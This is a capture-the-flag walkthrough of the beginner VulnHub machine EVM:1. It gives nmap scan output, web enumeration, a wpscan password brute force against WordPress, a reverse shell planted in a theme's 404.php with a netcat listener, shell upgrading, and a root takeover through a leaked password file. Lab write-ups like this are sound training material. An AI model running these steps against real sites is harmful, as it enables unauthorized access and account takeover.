WALKTHROUGH EVM:1
Hi Everyone Today we discuss about new vm machine EVM: 1 . This machine was designed by Ic0de. And this is a EVM series machine.
This works better with VirutalBox rather than VMware
You can download the vm from this link.
https://download.vulnhub.com/evm/EVM.ova
We see the description page and author has describe it is super friendly box intended for Beginner’s.
Network Scanning
So lets start off, first as usual we run a netdiscover -i vboxnet0.
So lets start off, first as usual we run a full port scan , this was what I got normal nmap scanning
# nmap -v 192.168.56.103 [ here -v is vervose mode ]
In this machine there are 22,53,80,110,139,143 & 445 ports are open .
Again we use nmap for ordinary scanning . Let’s start
# nmap -v -sC -sV -sT -p22,53,80,110,139,143,445 -O -A 192.168.56.103
[ Here -sC— script=default, -sV version info, -sT Connect scanning, -p port, -O OS detection & -A OS detection, version detection, script scanning, and traceroute ]
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)
| 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)
|_ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES CAPA SASL TOP PIPELINING AUTH-RESP-CODE UIDL
139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 more LITERAL+ have IMAP4rev1 post-login listed SASL-IR IDLE capabilities OK Pre-login ENABLE LOGIN-REFERRALS ID
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:45:FF:57 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2–4.9
Uptime guess: 0.016 days (since Sun Feb 14 23:12:04 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s
| nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| UBUNTU-EXTERMEL<00> Flags: <unique><active>
| UBUNTU-EXTERMEL<03> Flags: <unique><active>
| UBUNTU-EXTERMEL<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: ubuntu-extermely-vulnerable-m4ch1ine
| NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00
| Domain name: \x00
| FQDN: ubuntu-extermely-vulnerable-m4ch1ine
|_ System time: 2021–02–14T13:05:29–05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021–02–14T18:05:29
|_ start_date: N/A
Enumeration
As usual , we thought that port 80 would be our way in, so we tried to enumerate it as much as possible. We visit the page…
We found a default apache page. So i search /robots.txt file. we have nothing found on this page.
What is robots.txt file ?
Robots.txt is a text file webmasters create to instruct web robots (typically search engine robots) how to crawl pages on their website. The robots.txt file is part of the the robots exclusion protocol (REP), a group of web standards that regulate how robots crawl the web, access and index content, and serve that content up to users.
Next stage to go with http directory busting with nikto command .
# nikto -h http://192.168.56.56.03
and we found /info.php i go browser and search /info.php file.
we can only find phpinfo and php version So i and go and used dirb command . To find more.
# dirb http://192.168.56.103
we find some directory we can play with this directory and i open one by one direcroty on browser . I found some pages on http://192.168.56.103/wordpress/.
In the down we can see login and i click this and we redirect to wordpress login page .
I go to terminal and run wpscan command to brute user name.
# wpscan — url http://192.162.156.103 — enumerate u
In the above command we find username c0rrupt3d_brain. Again this time i brute force with this user to find password .
# wpscan — url http://192.168.56.103/wordpress -e u c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt
we find :-
|Username: c0rrupt3d_brain, Password: 24992499 .
After a minute we successfully crack the usernamesword let’s login with the WordPress panel and uploading our reverse shell.
Now we log in with user c0rrupt3d_brain. And we enter the wordpress dashboard.
It’s time to take reverse shell from wordpress..
Go on Appearance >Theme Editor
Then Click on “select theme to edit” and use Theme “TwentyNineteenClick on select.
Now Select “404 Template (404.php).
Proved.and replace the 404.php file contain with our given payload.
Start listner on terminal nc -nlvp 443 after this hint this url.
URL :- “http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/404.php”
we got reverse connection.
Not tty are found here.
so this command will solve our problem -
Command:- python -c ‘import pty; pty.spawn(“/bin/bash”)’
Firsty we check cat /etc/passwd file to find how many user.Firstly i go to cd /home directory and we found one user name root3r. I enter this user and many directory are found.
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ ls -lah
ls -lah
total 40K
drwxr-xr-x 3 www-data www-data 4.0K Nov 1 2019 .
drwxr-xr-x 3 root root 4.0K Oct 30 2019 ..
-rw-r — r — 1 www-data www-data 515 Oct 30 2019 .bash_history
-rw-r — r — 1 www-data www-data 220 Oct 30 2019 .bash_logout
-rw-r — r — 1 www-data www-data 3.7K Oct 30 2019 .bashrc
drwxr-xr-x 2 www-data www-data 4.0K Oct 30 2019 .cache
-rw-r — r — 1 www-data www-data 22 Oct 30 2019 .mysql_history
-rw-r — r — 1 www-data www-data 655 Oct 30 2019 .profile
-rw-r — r — 1 www-data www-data 8 Oct 31 2019 .root_password_ssh.txt
-rw-r — r — 1 www-data www-data 0 Oct 30 2019 .sudo_as_admin_successful
-rw-r — r — 1 root root 4 Nov 1 2019 test.txt
I enter one by one all directory. and i found some password in .root_password_ssh.txt directory
So i run su — root and enter password is willy26.
# cat proof.txt
cat proof.txt
voila you have successfully pwned me :) !!!
:D
root@ubuntu-extermely-vulnerable-m4ch1ine:~# id
id
uid=0(root) gid=0(root) groups=0(root)
Proved.
